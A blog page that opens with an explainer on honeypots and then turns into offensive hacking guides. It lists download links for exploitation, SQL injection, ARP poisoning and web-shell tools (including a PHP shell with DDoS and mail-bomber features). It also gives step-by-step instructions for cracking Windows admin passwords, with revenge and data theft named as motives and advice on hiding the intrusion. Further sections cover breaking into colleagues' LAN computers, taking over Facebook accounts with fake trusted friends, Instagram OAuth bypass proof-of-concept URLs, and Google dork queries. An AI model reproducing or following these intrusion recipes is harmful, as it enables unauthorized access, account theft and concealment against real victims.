Ads 468x60px

Tuesday 18 March 2014

HoneyPot


The first step to understanding honeypots is defining what a honeypot is. This can be harder then it sounds. Unlike firewalls or Intrusion Detection Systems, honeypots do not solve a specific problem. Instead, they are a highly flexible tool that comes in many shapes and sizes. They can do everything from detecting encrypted attacks in IPv6 networks to capturing the latest in on-line credit card fraud. Its is this flexibility that gives honeypots their true power. It is also this flexibility that can make them challenging to define and understand. As such, I use the following definition to define what a honeypot is.

A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource.

A honeypot is valuable as a surveillance and early-warning tool. While it is often a computer, a honeypot can take other forms, such as files or data records, or even unused IP address space. A honeypot that masquerades as an open proxy to monitor and record those using the system is known as a "sugarcane". Honeypots should have no production value, and hence should not see any legitimate traffic or activity. Whatever they capture is therefore malicious or unauthorized. One practical application of this is the spamtrap - a honeypot that thwarts spam by masquerading as a type of system abused by spammers. These honeypots categorize trapped material 100% accurately: it is all illicit.

Honeypots can carry risks to a network, and must be handled with care. If they are not properly walled off, an attacker can use them to break into a system.

Victim hosts are an active network counter-intrusion tool. These computers run special software, designed to appear to an intruder as being important and worth looking into. In reality, these programs are dummies, and their patterns are constructed specifically to foster interest in attackers. The software installed on, and run by, victim hosts is dual purpose. First, these dummy programs keep a network intruder occupied looking for valuable information where none exists, effectively convincing an intruder to isolate themselves in what is truly an unimportant part of the network. This decoy strategy is designed to keep an intruder from getting bored and heading into truly security-critical systems. The second part of the victim host strategy is intelligence gathering. Once an intruder has broken into the victim host, the machine or a network administrator can examine the intrusion methods used by the intruder. This intelligence can be used to build specific countermeasures to intrusion techniques, making truly important systems on the network less vulnerable to intrusion.
Types

Honeypots can be classified based on their deployment and based on their level of involvement. Based on the deployment, honeypots may be classified as

   1. Production Honeypots
   2. Research Honeypots


Production honeypots are easy to use, capture only limited information, and are used primarily by companies or corporations; Production honeypots are placed inside the production network with other production servers by an organization to improve their overall state of security. Normally, production honeypots are low-interaction honeypots, which are easier to deploy. They give less information about the attacks or attackers than research honeypots do. The purpose of a production honeypot is to help mitigate risk in an organization. The honeypot adds value to the security measures of an organization.

Research honeypots are run by a volunteer, non-profit research organization or an educational institution to gather information about the motives and tactics of the Blackhat community targeting different networks. These honeypots do not add direct value to a specific organization. Instead they are used to research the threats organizations face, and to learn how to better protect against those threats. This information is then used to protect against those threats. Research honeypots are complex to deploy and maintain, capture extensive information, and are used primarily by research, military, or government organizations.

Just as honeypots are weapons against spammers, honeypot detection systems are spammer-employed counter-weapons. As detection systems would likely use unique characteristics of specific honeypots to identify them, a great deal of honeypots in use makes the set of unique characteristics larger and more daunting to those seeking to detect and thereby identify them. This is an unusual circumstance in software: a situation in which "versionitis" (a large number of versions of the same software, all differing slightly from each other) can be beneficial. There's also an advantage in having some easy-to-detect honeypots deployed. Fred Cohen, the inventor of the Deception Toolkit, even argues that every system running his honeypot should have a deception port that adversaries can use to detect the honeypot. Cohen believes that this might deter adversaries.
Honeynets

Two or more honeypots on a network form a honeynet. Typically, a honeynet is used for monitoring a larger and/or more diverse network in which one honeypot may not be sufficient. Honeynets and honeypots are usually implemented as parts of larger network intrusion detection systems. A honeyfarm is a centralized collection of honeypots and analysis tools.

The concept of the honeynet first began in 1999 when Lance Spitzner, founder of the Honeynet Project, published the paper "To Build a Honeypot":

    "A honeynet is a network of high interaction honeypots that simulates a production network and configured such that all activity is monitored, recorded and in a degree, discreetly regulated"

Tools:-

Honey Drive : HoneyPot In the Box, HoneyDrive is a virtual hard disk drive (VMDK format) with Ubuntu Server 11.10 32-bit edition installed. It contains various honeypot systems such as Kippo SSH honeypot, Dionaea malware honeypot and Honeyd. Additionally it includes useful scripts and utilities to analyze and visualize the data it captures. Lastly, other helpful tools like tshark (command-line Wireshark), pdftools, etc. are also present. Read more
Download 


Value of Honeypots:

Now that we have understanding of two general categories of honepyots, we can focus on their value. Specifically, how we can use honeypots. Once again, we have two general categories, honeypots can be used for production purposes or research. When used for production purposes, honeypots are protecting an organization. This would include preventing, detecting, or helping organizations respond to an attack. When used for research purposes, honeypots are being used to collect information. This information has different value to different organizations. Some may want to be studying trends in attacker activity, while others are interested in early warning and prediction, or law enforcement. In general, low-interaction honeypots are often used for production purposes, while high-interaction honeypots are used for research purposes. However, either type of honeypot can be used for either purpose. When used for production purposes, honeypots can protect organizations in one of three ways; prevention, detection, and response. We will take a more in-depth look at how a honeypot can work in all three.

Honeypots can help prevent attacks in several ways. The first is against automated attacks, such as worms or auto-rooters. These attacks are based on tools that randomly scan entire networks looking for vulnerable systems. If vulnerable systems are found, these automated tools will then attack and take over the system (with worms self-replicating, copying themselves to the victim). One way that honeypots can help defend against such attacks is slowing their scanning down, potentially even stopping them. Called sticky honeypots, these solutions monitor unused IP space. When probed by such scanning activity, these honeypots interact with and slow the attacker down. They do this using a variety of TCP tricks, such as a Windows size of zero, putting the attacker into a holding pattern. This is excellent for slowing down or preventing the spread of a worm that has penetrated your internal organization. One such example of a sticky honeypot is LaBrea Tarpit. Sticky honeypots are most often low-interaction solutions (you can almost call them 'no-interaction solutions', as they slow the attacker down to a crawl :). Honeypots can also be protect your organization from human attackers. The concept is deception or deterrence. The idea is to confuse an attacker, to make him waste his time and resources interacting with honeypots. Meanwhile, your organization has detected the attacker's activity and have the time to respond and stop the attacker. This can be even taken one step farther. If an attacker knows your organization is using honeypots, but does not know which systems are honeypots and which systems are legitimate computers, they may be concerned about being caught by honeypots and decided not to attack your organizations. Thus the honeypot deters the attacker. An example of a honeypot designed to do this is Deception Toolkit, a low-interaction honeypot.

The second way honeypots can help protect an organization is through detection. Detection is critical, its purpose is to identify a failure or breakdown in prevention. Regardless of how secure an organization is, there will always be failures, if for no other reasons then humans are involved in the process. By detecting an attacker, you can quickly react to them, stopping or mitigating the damage they do. Tradtionally, detection has proven extremely difficult to do. Technologies such as IDS sensors and systems logs haven proven ineffective for several reasons. They generate far too much data, large percentage of false positives, inability to detect new attacks, and the inability to work in encrypted or IPv6 environments. Honeypots excel at detection, addressing many of these problems of traditional detection. Honeypots reduce false positives by capturing small data sets of high value, capture unknown attacks such as new exploits or polymorphic shellcode, and work in encrypted and IPv6 environments. You can learn more about this in the paper Honeypots: Simple, Cost Effective Detection. In general, low-interaction honeypots make the best solutions for detection. They are easier to deploy and maintain then high-interaction honeypots and have reduced risk.

The third and final way a honeypot can help protect an organization is in reponse. Once an organization has detected a failure, how do they respond? This can often be one of the greatest challenges an organization faces. There is often little information on who the attacker is, how they got in, or how much damage they have done. In these situations detailed information on the attacker's activity are critical. There are two problems compounding incidence response. First, often the very systems compromised cannot be taken offline to analyze. Production systems, such as an organization's mail server, are so critical that even though its been hacked, security professionals may not be able to take the system down and do a proper forensic analysis. Instead, they are limited to analyze the live system while still providing production services. This cripiles the ability to analyze what happend, how much damage the attacker has done, and even if the attacker has broken into other systems. The other problem is even if the system is pulled offline, there is so much data pollution it can be very difficult to determine what the bad guy did. By data pollution, I mean there has been so much activity (user's logging in, mail accounts read, files written to databases, etc) it can be difficult to determine what is normal day-to-day activity, and what is the attacker. Honeypots can help address both problems. Honeypots make an excellent incident resonse tool, as they can quickly and easily be taken offline for a full forensic analysis, without impacting day-to-day business operations. Also, the only activity a honeypot captures is unauthorized or malicious activity. This makes hacked honeypots much easier to analyze then hacked production systems, as any data you retrieve from a honeypot is most likely related to the attacker. The value honeypots provide here is quickly giving organizations the in-depth information they need to rapidly and effectively respond to an incident. In general, high-interaction honeypots make the best solution for response. To respond to an intruder, you need in-depth knowledge on what they did, how they broke in, and the tools they used. For that type of data you most likely need the capabilities of a high-interaction honeypot. 

Hacking Tools

     

winAUTOPWN v3.0 Released - System vulnerability exploitation
Framework


WINAUTOPWN ACTIVE SYSTEMS TRANSGRESSOR GUI [ C4 - WAST ] is a Systems and Network Exploitation Framework built on the famous winAUTOPWN as a backend.
C4 - WAST gives users the freedom to select individual exploits and use them.

BSDAUTOPWN has been compiled, like always for various flavours and has been upgraded to version 1.8 alongwith all applicable exploits
WINAUTOPWN requires PERL,PHP,PYTHON,RUBY and its dependencies alongwith a few others' too for smooth working of exploits included in it.

PhotobucketDownload 



The Mole: Automatic SQL Injection Exploitation Tool 

Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a Boolean query based technique. The Mole uses a command based interface, allowing the user to indicate the action he wants to perform easily. 
Read more



PhotobucketDownload 



Sqlninja 0.2.6

Features:
 >> Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
>>  Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental).
>> Creation of a custom xp_cmdshell if the original one has been removed
>> Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed).
>> TCP/UDP portscan from the target SQL Server to the attacking machine, in order
to find a port that is allowed by the firewall of the target network
and use it for a reverse shell.
>> Direct and reverse bindshell, both TCP and UDP
>> ICMP-tunneled shell, when no TCP/UDP ports are available for a direct/reverse
shell but the DB can ping your box.
>> DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for
 a direct/reverse shell, but the DB server can resolve external hostnames
 (check the documentation for details about how this works).
>> Evasion techniques to confuse a few IDS/IPS/WAF.
>> Integration with Metasploit3, to obtain a graphical access to the remote DB
 server through a VNC server injection.

PhotobucketDownload


HexorBase - The DataBase Hacker Tool

To Audit Management and Multiple Databases


HexorBase is a database application designed for management and audit multiple database servers simultaneously from a single location, is able to perform SQL queries and brute force attacks against servers common database ( MySQL, SQLite, Microsoft
SQL Server, Oracle, PostgreSQL ).

This tool is simple to use and very practical, may have to know a little SQL, but the basics.


HexorBase runs on Linux and presumably Windows, and requires:
python-qt4 python python-MySQLdb cx_Oracle python-psycopg2 python-python-qscintilla2 pymssql
To install it you must download and from the console:
root @ host: ~ # dpkg-i hexorbase_1.0_all.deb


Project website and download HexorBase: 

http://code.google.com/p/hexorbase/



Net Tools 5.0 (Net Tools 5.x)


This tools is a hacker friendly. Net Tools is a comprehensive set of host monitoring, network scanning, security, administration tools and much more, all with a highly intuitive user interface. It's an ideal tool for those who work in the network security, administration, training, internet forensics or law enforcement internet crimes fields. Net Tools is mainly written in Microsoft Visual Basic 6, Visual C++, Visual C# and Visual Studio .NET.
There has a 175 tools list in one software.. Tools Content

PhotobucketDownload

ARPwner – ARP & DNS Poisoning Attack Tool
ARPwner is a tool to do ARP poisoning and DNS poisoning attacks, with a simple GUI and
a plugin system to do filtering of the information gathered, also has a implementation of SSLstrip and is coded in python.


PhotobucketDownload                                                                                                           
Read more 


Intercepter Sniffer

Intercepter is a sniffer tool which offers various capabilities including sniffing for password hashes related to ICQ/IRC/AIM/FTP/IMAP/POP3/SMTP/LDAP/BNC/SOCKS/HTTP/
WWW/NNTP/CVS/TELNET/MRA/DC++/VNC/MYSQL and ORACLE. It also sniffs ICQ/
AIM/JABBER/YAHOO/MSN/GADU-GADU/IRC and MRA protocols. It has a built-in arp poisoning module, can change MAC addresses of LAN adapters, and has various other interesting functionality.

PhotobucketDownload 


Havij v1.15 Advanced SQL Injection
Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page.

PhotobucketDownload 


Ani-Shell


Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , DDoser, Back Connect , Bind Shell etc etc ! This shell has immense capabilities and have been written with some coding standards in mind for better editing and customization.

Customisation
 
1. Email Trace back is set to Off as default and emails will not be sent , If you are setting
this feature on make sure you change the default email address (lionaneesh@gmail.com)
 to Your email address , Please Change it before using.

2. Username and Passwords are set to lionaneesh and lionaneesh respectively , Please change them for better
security.
3. As a default Lock Mode is set to on! This should not be change unless you want your shell exposed.

Default Login
Username : lionaneesh
Password : lionaneesh

Features
 
    Shell
    Platform Independent
    Mass - Mailer
    Small Web-Server Fuzzer
    DDoser
    Design
    Secure Login
    Deletion of Files
    Bind Shell
    Back Connect
    Fixed Some Coding errors!
    Rename Files
    Encoded Title
    Traceback (Email Alerts)
    PHP Evaluate
    Better Command Execution (even supports older version of PHP)
    Mass Code Injector (Appender and Overwriter)
    Lock Mode Customization

Latest Version Addition
    Mail Bomber (With Less Spam detection feature)
    PHP Decoder
    Better Uploader
    Fixed some Coding errors

PhotobucketDownload



SQL MAP 0.9                                        


sqlmap 0.9 has been released and has a considerable amount of changes including an almost entirely re-written SQL Injection detection engine.

Sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a kick-ass detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Its a good tools for find Sql Vulnerability.

New Features/Changes-->

Rewritten SQL injection detection engine (Bernardo and Miroslav).
Support to directly connect to the database without passing via a SQL injection, -d switch (Bernardo and Miroslav).
Added full support for both time-based blind SQL injection and error-based SQL injection techniques (Bernardo and Miroslav).
Implemented support for SQLite 2 and 3 (Bernardo and Miroslav).
Implemented support for Firebird (Bernardo and Miroslav).
Implemented support for Microsoft Access, Sybase and SAP MaxDB (Miroslav).
Added support to tamper injection data with –tamper switch (Bernardo and Miroslav).
Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack (Miroslav).
Added support to fetch unicode data (Bernardo and Miroslav).
Added support to use persistent HTTP(s) connection for speed improvement, –keep-alive switch (Miroslav).
Implemented several optimization switches to speed up the exploitation of SQL injections (Bernardo and Miroslav).
Support to parse and test forms on target url, –forms switch (Bernardo and Miroslav).
Added switches to brute-force tables names and columns names with a dictionary attack, –common-tables and –common-columns.

PhotobucketDownload


DRIL – Domain Reverse IP Lookup Tool:

DRIL (Domain Reverse IP Lookup) Tool is a Reverse Domain Tool that will really be useful for penetration testers to find out the domain names which are listed in the the target host, DRIL is a GUI, JAVA based application which uses a Bing API key.

DRIL has a simple user friendly interface which will be helpful for penetration tester to do their work fast without a mess, this is only tested on Linux but as it is JAVA it should work on Windows too.
There are various other tools which carry out similar tasks..

PhotobucketDownload


Hackers Types

Hackers are three types:-
 
1.    White hat hacker
2.    Gray hat hacker 
3.    Black hat hacker

White Hat and Grey Hat Hacker & What is the Real Difference?
 
What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.


So, what is ethical hacking white hat and how does it differentiate from grey hackers? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts. 

  

What Is A White Hat Hacker?
 
A hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of  cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world.
In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent ma chines so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a determine code in a telephone in order to make free international calls.

 
 When computers appeared, this people found a new realm where they could exploit their skills. Now they were not limited to the constraints of the physical world, instead, they could travel through the virtual world of computers. Before the internet, they used Bulletin Board Systems (BBS) to communicate and exchange information. However, the real explosion occurred when the Internet appeared.

Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hacker, also known as a cracker, someone who uses his computer knowledge in criminal activities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.

On the other side is the white hat hacker. Although white hat hacking can be considered similar to a black hacker, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world, who want to test their systems, contract white hackers. They will test how secure are their systems, and point any faults that they may found. If you want to become a hacker with a white hat, Linux, a PC and an internet connection is all you need.



Grey Hat Hackers
A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in
order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.
For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime. 

If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, and post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hackers.

If you want to know more about hackers, then you can attend one of their annual conventions. Every year, hackers from all over the US, and from different parts of the world, reunite and meet at DEF CON. These conventions are much concurred. In the last one, 6,600 people attended it.

Every year, DEF CON is celebrated at Las Vegas, Nevada. However, hackers are not the only ones who go to this event. There are also computer journalists, computer security professionals, lawyers, and employees of the federal government. The event is composed by tracks of different kind, all of them related, in some way, to the world of hackers (computer security, worms, viruses, new technologies, coding, etc). Besides the tracks, there are contests that involve hacking computers, l ock picking and even robot related events. Ethical hacking, white hat hacking or whatever names you wish to use, at the end, it has a purpose: to protect the systems of organizations, public or private, around the world. After all, hackers can now be located anywhere, and they can be counted by the millions. Soon, concepts like white hat, linux operating system or grey hat will become common knowledge. A real proof of how much has our society been influenced by technology.



Black Hat Hackers

Black hat hackers have become the iconic image of all hackers around the world. For the majority of computer users, the word hacker has become a synonym for social misfits and criminals.
Of course, that is an injustice created by our own interpretation of the mass media, so it is important for us to learn what a hacker is and what a black hacker (or cracker) does. So, let's learn about black hat techniques and how they make our lives a little more difficult.
Black hat is used to describe a hacker (or, if you prefer, cracker) who breaks into a computer system or network with malicious intent. Unlike a white hat hacker, the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose. The black hat hacker may also make the exploit known to other hackers and/or the public without notifying the victim. This gives others the opportunity to exploit the vulnerability before the organization is able to secure it.

 
What Is Black Hat Hacking?
 
A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the force), is someone who uses his skills with a criminal intent. Some examples are: cracking bank accounts in order to make transfernces to their own accounts, stealing information to be sold in the black market, or attacking the computer network of an organization for money.

Some famous cases of black hat hacking include Kevin Mitnick, who used his black hat hackers skills to enter the computers of organizations such as Nokia, Fujitsu, Motorola and Sun Microsystems (it must be mentioned that he is now a white hat hacker); Kevin Poulsen, who took control of all the phone lines in Los Angeles in order to win a radio contest (the prize was a Porsche 944 S2); and Vladimir Levin, which is the handle of the mastermind behind the stealing of $10'000,000 to Citigrou. 

Hack Windows Admin

Today, i am going to show you many aspects of the Windows Password Storage path, Method of Encryption, and breaking into Windows by cracking the admin password. We need this often for many reasons:
1) Sometime we have forgotten our old password and Hint isn't helping out.
2) We want to break into someone computer to get the information.
3) Just want to take revenge from someone.
4) Stealing computer data.

Lets, take a deep dive in Cracking Windows password and also where these are stored and in which format.

SAM file and Password Hashes~Place where these passwords are stored in Hashes:
Password Hashes - When you type your password into a Windows NT, 2000, or XP login Windows Seven, Vista etc Windows encrypts your password using a specific encryption scheme that turns your password into something that looks like this:
                    7524248b4d2c9a9eadd3b435c51404eddc5

This is a password Hash. This is what is actually being checked against when you type your password in. It encrypts what you typed and bounces it against what is stored in the Registry and/or SAM File. 
You can break this hash password from
SAM File - Holds the user names and password hashes for every account on the local machine, or domain if it is a domain controller.

Location of SAM/Hashes:
You can find what you're looking for in several locations on a given machine.
It can be found on the hard drive in the folder %systemroot%system32config (i-eC:\windows\system32\config). However this folder is locked to all accounts including Administrator while the machine is running. The only account that can access the SAM file during operation is the "System" account.

The second location of the SAM or corresponding hashes can be found in the registry. It can be found under HKEY_LOCAL_MACHINESAM. This is also locked to all users, including Administrator, while the machine is in use.(GO to Run and Type Regedit and Hit enter, Now scroll to HKEY_LOCAL_MACHINESAM, However you may not access to it.)

So the two (Some other also) locations of the SAMHashes are:
- %systemroot%system32config
- In the registry under HKEY_LOCAL_MACHINESAM
Cracking or Breaking Into Admin Account:
How to get Hashes form SAM file?
Well, Below are the methods to do so:
1) Well, the easiest way to do this is to boot your target machine to an alternate OS like
NTFSDOS or Linux and just copy the SAM from the %systemroot%system32config  folder. 
It's quick, it's easy, and it's effective. You can get a copy of NTFSDOS from Sysinternals(http://www.sysinternals.com) The regular version of NTFSDOS is freeware, which is always nice, but only allows for Read-Only access. This should be fine for what you want to do, however, if you're the kind of person that just has to have total control and has some money to burn. NTFSDOS Pro, which is also by Sysinternals has read/write access but it'll cost you $299.

2) You can also get password hashes by using pwdump2 (Google It to get software ~ Search at openwall.com). pwdump uses .DLL injection in order to use the system account to view and get the password hashes stored in the registry. It then obtains the hashes from the registry and stores them in a handy little text file that you can then  paste them into a password cracking utility like l0phtcrack or John the ripper (Linux Based works well) also cain and abel can be used. 

3) Import Hashes directly from l0phtcrack, and let them open to you by cracking.


Obtained Hashes? Now crack them:
Well, as i have said that these can't be reversed but somehow automated famous cracking softwares can be used to achieve the target. Yes, it is possible, All we have to do is to have a bit patience. The software will use a lot of strings and will compare these hashes also, Inshort it will decode them.
1) John the Ripper - John the Ripper is to many, the old standby password cracker. It is command line which makes it nice if you're doing some scripting, and best of all it's free and in open source. The only real thing that JtR is lacking is the ability to launch Brute Force attacks against your password file. But look at it this way, even though it is only a dictionary cracker, that will probably be all you need. I would say that in my experience I can find about 85-90% of the passwords in a given file by using just a dictionary attack.

2) 
L0phtCrack - Probably the most wildly popular password cracker out there. L0phtCrack is sold by the folks at @Stake. And with a pricetag of $249 for a single user license it sure seems like every one owns it. This is probably the nicest password cracker you will ever see. With the ability to import hashes directly from the registry pwdump and dictionary, hybrid, and brute-force capabilities. No password should last long. Well, I shouldn't say "no password". But almost all will fall to L0phtCrack given enough time.

Making Your Own Password in Windows: 
Injecting Password Hashes into the SAM:
Easiest ways to gain Administrator privileges on a machine, is by injecting your own password hashes into the SAM file. In order to do this you will need physical access to the machine and a brain larger than a peanut. Using a utility called "
chntpw" by Petter Nordhal-Hagen you can inject whatever password you wish into the SAM file of any NT, 2000, or XP machine thereby giving you total control, just burn the .iso on a disk and use it. I would give a tip like backing up the SAM file first by using an alternate OS.Make a USB disk of linux or Windows Live dsik can also work. Go in, inject the password of your choosing. Login using your new password. Do what you need to do. Then restore the original SAM so that no one will know that i was hacked.

You need to have admin access to perform this change from the command line. This is an especially handy trick if you want to change a password on an account but you’ve forgotten the original (going through the Control Panel can require confirmation of the old password).

Now we hack Admin Password To verify the user name, by simply typing net user, I get a list of all the user names on that windows machine. Now, go to the command prompt and enter:

                                                                 cd\
cd windows\system32
net user  
If there are people near you and you don’t want them to see the password you type, enter:
net user *
                                                             E.g. > net user username *
                                                      > Type a password for the user:
                                                      > Confirm the password:




Another Easy method, Using  ophcrack to Hack into Admin Account:
Ophcrack is a Windows password cracker based on a time-memory trade-off using rainbow tables. This is a new variant of Hellman's original trade-off, with better performance. It recovers 99.9% of alphanumeric passwords in seconds.

This is a type of offline cracking, Just grab .iso of ophcrack from here. Burn it and enjoy using.
1.  Opchrack can crack passwords for Windows 7, Windows Vista, and Windows XP.
2. Ophcrack can recover 99.9% of passwords from Windows XP, usually in a matter of seconds. Any  14-character or smaller password that uses any combination of numbers, small letters, and capital letters should be crackable.
3.  Ophcrack can recover 99% of passwords from Windows 7 or Windows Vista. A dictionary attack is used in Windows 7 and Vista.
4.  The Ophcrack LiveCD option allows for completely automatic password recovery.
5.  LiveCD method requires no installation in Windows, making it a safe alternative to many other password recovery tools.
6.  No Windows passwords need to be known to use the Ophcrack LiveCD to crack your Windows passwords.
I think this ophcrack method is far better, Try this one just get a disk and write it, Or else USB disk can aslo be used.

Some security Tips ~ Making strong passwords:
Now, You might have come to know that how passwords can be cracked, So there are some tips for you.
1) Do not make common passwords like 123456 or the one of your own name.
2) Use @, *, # or other symbols in your passwords to ensure maximum security in this case John the ripper and Ophcrack and also other cracking tools may take long time, it will be frustrating for hacker.
3) Keep changing your password. So, that if long time is taken by one hash to decode, until it decodes you have generated another hash.

Hack Victim Computer

How To Hack & Access Same LAN Computers ?
If you are working in Office / Colleges and want to hack your friends & college mate PC then here is a trick.

First Step press win+ R

Go to Run> Type Cmd

now type command net view

It will be look as below


C:\>net view

Server Name            Remark
-----------------------------------------------
\\xyz
\\abc



Here you can get all the names of all the computers machine names which connect with your LAN.

Now you got the name.  Lets start hacking into the systems.

After you get server name now type tracert command for knowing IP of the victim machine.

Example: C:\> tracert xyz

Here you get the IP address of the XYZ computer machine.

Now go to windows start button and type Remote Desktop Connection
 

After click on Remote Desktop Connection you get below image..
 


Now type the IP address or computer name of victim machine.

Click on Connect <-|
It will also ask administrator password which is common as usual you known about.

After few second Victim machine shown in your Computer..
Now you can access that machine to open website, files, Software's, etc

Enjoy the trick..

Hack Instagram Account

Nir Goldshlager Founder of Break Security find the critical vulnerability in Instagram. Succesful hack allows attacker to access private photos and ability to delete victim's photos, edit comment and post new photos.

1. Hijack Instagram accounts using the Instagram OAuth (https://instagram.com/oauth/authorize/)

2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)


He reported a few issues to Instagram Include OAuth Attacks, But  the acquisition didn’t closed yet and Facebook Security was unable to put their hands on security issues in Instagram, So I was waiting, Waiting like a good WhiteCollar,  Then Facebook Security send me a message, They say even that they was unable to fix this issues because the acquisition didn’t closed yet, They will still payout for this vulnerabilities,

So, first,  checked Instagram’s OAuth protocol:  (http://instagram.com/developer/authentication/)

While researching Instagram’s security parameters, Nir noticed that Facebook Security had produced some impressive results in regard to their own Instagram OAuth vulnerabilities. They essentially blocked access to any and all files, folders, and subdomains by validate the redirect_uri parameter.

 



In addition, redirection was only allowed to go to the owner app domain.
Thus, hacker needed to locate some other way to get past their protection. Further complicating the issue was the fact that you can’t use a site redirection / XSS on the victim’s owner app. This is because you have no access to the files or folders on the owner app domain through the redirect_uri parameter.


Block Files Folders

For example:

Allow request:

https://apigee.com

Block requests:

Redirect_uri=https://www.breaksec.com

Redirect_uri=https://a.apigee.com/

Redirect_uri=https://apigee.com/x/x.php

Redirect_uri=https://apigee.com/%23,? or any special sign

As it stands, it appears that the redirect_uri is invulnerable to OAuth attacks.

While researching, I came upon a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth and then send the access_token code to their own domain.

For instance:

Let’s say Nir app client_id in Instagram is 33221863xxx and my domain is breaksec.com

In this case, the redirect_uri parameter should allow redirection only to my domain (breaksec.com), right? What happens when we change the suffix in the domain to something like:

Breaksec.com.mx

In this example, the attacker can send the access_token, code straight to breaksec.com.mx. For the attack to be successful, of course, the attacker will have to buy the new domain (in this case, breaksec.com.mx).

PoC Bypass (Fixed By Facebook Security Team):

https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token


Game Over.

Bug 2.

With this bug, Nir used the Instagram client_id value through the Facebook OAuth (https://www.facebook.com/dialog/oauth).

When you use the Instagram app, it can be integrated with Facebook.

For example:

When a user wants to upload their Instagram photos to Facebook, they allow this interaction and integration to take place.


Instagram Would like to access your public profile and friend list

Nir discovered that an attacker can use virtually any domain in the redirect_uri, next parameter. This was actually sort of baffling, and I don’t know why this happened, but it worked. You can literally use any domain in redirect_uri, next parameter via the redirect_uri in Instagram client_id.

This effectively allows the attacker to steal the access_token of any Instagram user,

With the access_token the attacker will be able to post on the victim behalf in his Facebook account, Access to his private friends list.

PoC (Facebook Already fixed this issue):

https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token
 Video:

Hack Facebook Account



Hence we know that there are many techniques for Hack Facebook Account like Phishing Attacks, Keylogging and other Social techniques but today we are going to see how to hack passwords using new feature introduced by Facebook the 3 Trusted Friends Password Recovery Feature in this what happens if you have lost your password and you don’t have any access to your default email address than this feature will handy by sending request to your 3 trusted friends and hence gaining your account password again.
For this technique you need to create 3 fake Facebook account and you need to surely add these as friends into your victims account whose account you are going to hack.

After success full addition of your fake accounts into victims account as friends follow the below steps .:

1. Go to Facebook and click Forgot your Password ?



2. Than you will get something like below just enter the details you know about him enter his Username, email address and full name.



3. After entering everything check it again and click on search.


4. After succeful search for the user Facebook will show some information about how many emails are linked to the account and there is simple option saying 
No Longer Access to These click that one.


5. Now it will promote you to enter a new email address on which you will get the password resetting option so enter your email address I suggest you creating a Fake or Temporary email address for safety purpose.


6. Than it will promote you to enter the Security well if you have some security guess about that one than that’s ok but if you don’t know it than simply enter 3 wrong answers and it will take you to the 3 trusted friends recovery page like below.


7. Now just click continue and facebook will ask you to choose 3 trusted friends choose the 3 fake profiles of your which you created and added into the victims account. 
8. After selecting 3 accounts facebook will send security codes to these accounts just enter these codes and you will get Password Resetting email from Facebook on the account you created in Step 5

That’s it now you are successful in Hacking Facebook Password with the 3 Trusted Friends Method.

Note: This Vulnerability has been fixed by Facebook

Google Hacking

Google queries for locating various Web servers
“Apache/1.3.28 Server at” intitle:index.of
Apache 1.3.2
“Apache/2.0 Server at” intitle:index.of
Apache 2.0
“Apache/* Server at” intitle:index.of
any version of Apache
“Microsoft-IIS/4.0 Server at” intitle:index.of
Microsoft Internet Information Services 4.0
“Microsoft-IIS/5.0 Server at” intitle:index.ofMicrosoft Internet Information Services 5.0
“Microsoft-IIS/6.0 Server at” intitle:index.of
Microsoft Internet Information Services 6.0
“Microsoft-IIS/* Server at” intitle:index.of
any version of Microsoft Internet Information Services
“Oracle HTTP Server/* Server at” intitle:index.of
any version of Oracle HTTP Server
“IBM _ HTTP _ Server/* * Server at” intitle:index.of
any version of IBM HTTP Server
“Netscape/* Server at” intitle:index.of
any version of Netscape Server
“Red Hat Secure/*” intitle:index.of
any version of the Red Hat Secure server
“HP Apache-based Web Server/*” intitle:index.of
any version of the HP server
Queries for discovering standard post-installation
intitle:”Test Page for Apache Installation” “You are free”
Apache 1.2.6
intitle:”Test Page for Apache Installation” “It worked!” “this Web site!”
Apache 1.3.0 – 1.3.9
